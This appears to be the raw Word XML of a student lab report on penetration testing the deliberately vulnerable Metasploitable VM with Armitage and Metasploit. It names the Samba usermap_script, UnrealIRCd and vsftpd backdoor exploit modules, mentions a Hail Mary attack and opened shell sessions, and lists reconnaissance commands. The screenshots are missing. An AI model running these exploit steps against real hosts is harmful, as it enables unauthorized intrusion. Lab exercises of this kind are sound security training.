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28532" w14:textId="4F03B1A2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 xml:space="preserve">Pen-testing with Armitage and Metasploit on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754CA04F" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AEEC0A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2CA2007E" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF9B8D7" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5034EC7E" w14:textId="254B3857" w:rsidR="003E1871" w:rsidRDefault="00E47EDB" w:rsidP="00E47EDB">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rP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postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start.  The database server by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will be started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19617631" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB" w:rsidP="00E47EDB">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>armitage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4AFFF62A" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB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30" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="675620C2" wp14:editId="6E3396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6894195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="1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689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38438" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E4445D1" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP address. The IP address of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS is given. We can see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Operating system in the window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3724DE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26" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C136028" wp14:editId="1E5CB53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5142230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="2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E0621" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758E03A4" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Now we find attacks in the attacks tab. It appears in the following way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642E9ABE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27" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65A12B9D" wp14:editId="7313130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36814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3DCEE4F1" wp14:editId="4531B7E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4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CA72D" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="0FD63002" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="29" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F692EA1" wp14:editId="212E86D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5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t xml:space="preserve"> I have launched the Hail Mary and found 2 sessions. Removed the other host-Metasploi</w:t>
      </w:r>
      <w:r>
        <w:t>t.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC7B38" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="3F0FD98D" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="5E19D7A1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10F6DFD6" wp14:editId="69F5DB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I have used the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> console and tried the exploits in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20721A6D" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="546C8064" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="61867064" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="7D929407" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="7B45B95D" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="3CE5297C" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="3E7547E6" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871"/>
    <w:p w14:paraId="345411D4" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CD29A" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70681697" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643784FB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3" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17EEBCE9" wp14:editId="3CD1FCD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58134" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256A7093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4" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5EDE189A" wp14:editId="0962AAE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D7238" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C3BEBD" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04791DD3" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>By trial and error I have tried the following exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3579CDDE" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDB898E" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D38C023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>exploit/multi/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">   &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752FD75A" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47659354" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED1CC45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5" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="294258E6" wp14:editId="71593D41">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-66675</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>935990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="6046470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="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622DE" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C49A82" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C682A72" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03311A41" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC8E3FE" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDF397A" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04ACE2A1" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777EDDC7" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590F0A56" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310C6693" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C7ED5E" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67EA126D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6" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="078FCE51" wp14:editId="32EABBE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D34A" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A382BE" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">I have tried the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>following commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DB8A18" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394D70BE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7" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7236D1B9" wp14:editId="3C1893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B0170" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A30C6A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8" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15DABCBE" wp14:editId="038789F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12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0198D" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0080DDF0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9" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01C45A0B" wp14:editId="64BF09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046470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="13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FE00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0" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FEB955A" wp14:editId="5BCD4B2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68140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="14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34096" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Next with trial and error I found the following exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C017FCE" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3090B5FD" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>unix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irc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA26E92" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0478B1B5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1" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6DC9E100" wp14:editId="74C9AD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215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="15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617FD" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D131756" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>As we can see shell session 1 has opened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3072EA3A" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>RHOST 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43907E73" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194FD147" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>I have tried the following commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261C5FEB" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29988D05" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C66B9B4" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEF13C4" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DD63D30" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2EF6455D" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CFBBFB" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47EDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146B52B2" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74502737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0" distR="0" simplePos="0" relativeHeight="12" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7805214F" wp14:editId="77DBDA0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215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="16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D5DCB" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3004157B" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B8D645" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7900CC96" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB58730" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050FF71C" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5087A944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3" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4848CC0F" wp14:editId="2BC9433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215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="1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5631A" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5567CEA3" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6F162A" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B1FFA7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4" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6324D180" wp14:editId="1685F5A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68140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="18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9A4EC" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4428EA38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 xml:space="preserve">By trial and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>errror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> I found the following exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AE432D" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68541792" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D19308D" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="00E47ED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unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_243_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A687C5F" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257818C3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5" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C2D5BC3" wp14:editId="632610B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19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AB8ED" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32750589" w14:textId="77777777" w:rsidR="003E1871" w:rsidRDefault="003E1871">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
